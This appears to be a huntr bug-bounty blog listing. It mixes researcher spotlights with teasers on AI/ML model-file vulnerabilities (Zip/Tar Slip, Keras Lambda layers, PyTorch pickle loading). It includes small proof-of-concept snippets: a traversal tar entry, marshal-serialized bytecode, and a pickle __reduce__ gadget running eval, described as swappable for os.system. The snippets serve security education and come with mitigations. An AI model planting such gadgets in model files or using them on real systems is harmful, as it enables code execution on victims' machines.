The ability to save (serialize) and load (deserialize) trained models is fundamental to machine learning frameworks. Training a neural network can take hours, days, or even weeks on expensive hardware, so developers need to save their work and share it with others. Every major framework (PyTorch, TensorFlow, scikit-learn) implements these features because without them, machine learning would be impractical at scale.
Introduction Some researchers dip their toes into AI/ML security. Phung Van Tai (aka @taiphung217) cannonballed in. Valedictorian of Vietnam’s Academy of Cryptography Techniques and now an AppSec engineer at OneMount Group, Tai rocketed from newcomer to quarterly #1 on the huntr leaderboard in just five months. Impressive, right? Dive into his journey below to see the full story.
Introduction Some Ph.D. candidates stay up late fine-tuning models. Tong Liu (aka Lyutoon) stays up late trying to break them. At huntr, we’ve got a thing for spotlighting hackers. This month, the beam lands on Lyutoon, a Ph.D. student at the Institute of Information Engineering, Chinese Academy of Sciences. So grab your beverage of choice and let’s dive into the mindset, methods, and mayhem behind this fast-rising hunter. Tell us a bit about yourself—what’s your background or story?...
Many ML model files (.nemo, .keras, .gguf, even trusty .pth) are just zip/tar archives in disguise. Feed one to a loader that blindly calls extractall(), and pow: you've opened the door to an archive-slip (Zip Slip, TarSlip) directory-traversal bug.
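The mechanics are easy to reproduce with the standard library alone. A minimal sketch: build a tar archive whose member name contains `../` components, then show a loader-side check that resolves each member's real path before extracting. The function names (`build_slip_tar`, `safe_extract`) are illustrative, not from any particular framework.

```python
import io
import os
import tarfile

def build_slip_tar() -> bytes:
    """Build an in-memory tar whose member path escapes the extraction dir."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        data = b"owned"
        info = tarfile.TarInfo(name="../../evil.txt")  # the traversal payload
        info.size = len(data)
        tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def safe_extract(tar_bytes: bytes, dest: str) -> None:
    """Reject any member that would resolve outside dest before extracting."""
    dest_real = os.path.realpath(dest)
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tf:
        for member in tf.getmembers():
            target = os.path.realpath(os.path.join(dest_real, member.name))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError(f"blocked traversal entry: {member.name}")
        tf.extractall(dest_real)
```

A naive `tarfile.extractall()` would happily write `evil.txt` two directories above the destination; the path check above is the classic mitigation (newer Pythons also offer `tarfile`'s `filter="data"` extraction filter for the same purpose).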
Before Google even filed CVE-2025-1550, one of our Huntr researchers, Mevlüt Akçam (aka mvlttt on huntr), quietly unearthed a critical flaw that delivers arbitrary code execution the moment you load a malformed .keras model—or, astonishingly, even a JSON file. In the post below, they’ll walk you step-by-step through the discovery process and unpack their proof-of-concept.
Introduction Some people skipped online classes during lockdown to binge Netflix. Arun Krishnan skipped them to hack around on cheats for an online game—and ended up chasing bug bounties. This month, we're spotlighting Arun, aka winters0x64. Arun’s a 20-year-old cybersecurity student from Kerala, India, who sharpened his skills playing CTFs with Team bi0s—India’s leading cybersecurity research club. After plenty of hypothetical hacks, Arun jumped onto huntr, ready to tackle real-world...
Sometimes the simplest bugs are the most dangerous — especially when they’ve been hiding in plain sight.
In this blog, we’re breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like TensorFlow—with its Keras Lambda layers—can be exploited. This example is a perfect starting point if you're looking to find and report your own MFVs.
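The core risk behind Lambda layers is that serializing a Python function means serializing its compiled bytecode, which the loader later rebuilds and may execute. A stdlib-only sketch of that underlying mechanism (marshal + base64, as Keras has historically used for Lambda serialization); the `payload` function is illustrative:

```python
import base64
import marshal
import types

# Attacker side: serialize a function's code object into a model file field.
def payload():
    return "arbitrary code ran"

blob = base64.b64encode(marshal.dumps(payload.__code__))

# Victim side: a loader that trusts the blob rebuilds the function and calls it.
code = marshal.loads(base64.b64decode(blob))
rebuilt = types.FunctionType(code, {})
print(rebuilt())  # the attacker's code executes during model loading
```

This is why modern Keras refuses to deserialize Lambda layers unless safe mode is explicitly disabled: there is no way to rebuild the function without trusting its bytecode.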
In this blog, we're breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like PyTorch can be exploited. This example is a perfect starting point if you're looking to find and report your own MFVs on huntr.
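PyTorch's default checkpoint format is pickle-based, and pickle lets any object dictate what happens when it is deserialized via `__reduce__`. A minimal sketch using plain `pickle` to show the gadget class an attacker would embed in a malicious .pth file; the `Gadget` class name and payload string are illustrative:

```python
import pickle

class Gadget:
    """A __reduce__ payload like those embedded in malicious .pth files."""
    def __reduce__(self):
        # On unpickling, Python calls eval(...) with attacker-chosen input.
        return (eval, ("'code executed during load'",))

blob = pickle.dumps(Gadget())       # attacker crafts the model file
result = pickle.loads(blob)         # victim "loads the model" -> call fires
print(result)
```

Swap `eval` for `os.system` and the payload string for a shell command, and simply loading the file compromises the host, which is why `torch.load` should only be pointed at trusted checkpoints (or used with `weights_only=True`).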
Dan McInerney shares strategic tips for bug bounty success, focusing on AI/ML model file vulnerabilities and effective tool usage for impactful discoveries.
Huntr Blog
Discover how to identify and exploit vulnerabilities in machine learning model file formats like GGUF, Keras, and ONNX.